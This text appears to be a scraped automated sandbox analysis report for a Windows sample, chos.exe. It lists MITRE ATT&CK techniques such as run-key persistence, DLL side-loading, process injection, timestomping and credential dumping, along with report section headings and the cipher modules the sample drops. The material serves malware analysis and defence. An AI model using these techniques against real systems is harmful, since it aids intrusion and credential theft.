Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Modification, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify file time attributes to hide new or changes to existing files. Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder. This is done, for example, on files that have been modified or created by the adversary so that they do not appear conspicuous to forensic investigators or file analysis tools.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata, File: File Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report chos.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Location Tracking

Compliance

Spreading

Networking

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Private

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Temp\_MEI74682\Crypto\Cipher\_ARC4.pyd

C:\Users\user\AppData\Local\Temp\_MEI74682\Crypto\Cipher\_Salsa20.pyd

C:\Users\user\AppData\Local\Temp\_MEI74682\Crypto\Cipher\_chacha20.pyd

C:\Users\user\AppData\Local\Temp\_MEI74682\Crypto\Cipher\_pkcs1_decode.pyd

C:\Users\user\AppData\Local\Temp\_MEI74682\Crypto\Cipher\_raw_aes.pyd

C:\Users\user\AppData\Local\Temp\_MEI74682\Crypto\Cipher\_raw_aesni.pyd

C:\Users\user\AppData\Local\Temp\_MEI74682\Crypto\Cipher\_raw_arc2.pyd

C:\Users\user\AppData\Local\Temp\_MEI74682\Crypto\Cipher\_raw_blowfish.pyd

C:\Users\user\AppData\Local\Temp\_MEI74682\Crypto\Cipher\_raw_cast.pyd

C:\Users\user\AppData\Local\Temp\_MEI74682\Crypto\Cipher\_raw_cbc.pyd

C:\Users\user\AppData\Local\Temp\_MEI74682\Crypto\Cipher\_raw_cfb.pyd

C:\Users\user\AppData\Local\Temp\_MEI74682\Crypto\Cipher\_raw_ctr.pyd

C:\Users\user\AppData\Local\Temp\_MEI74682\Crypto\Cipher\_raw_des.pyd

C:\Users\user\AppData\Local\Temp\_MEI74682\Crypto\Cipher\_raw_des3.pyd

C:\Users\user\AppData\Local\Temp\_MEI74682\Crypto\Cipher\_raw_ecb.pyd

C:\Users\user\AppData\Local\Temp\_MEI74682\Crypto\Cipher\_raw_eksblowfish.pyd

C:\Users\user\AppData\Local\Temp\_MEI74682\Crypto\Cipher\_raw_ocb.pyd

Windows Analysis Report
chos.exe

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre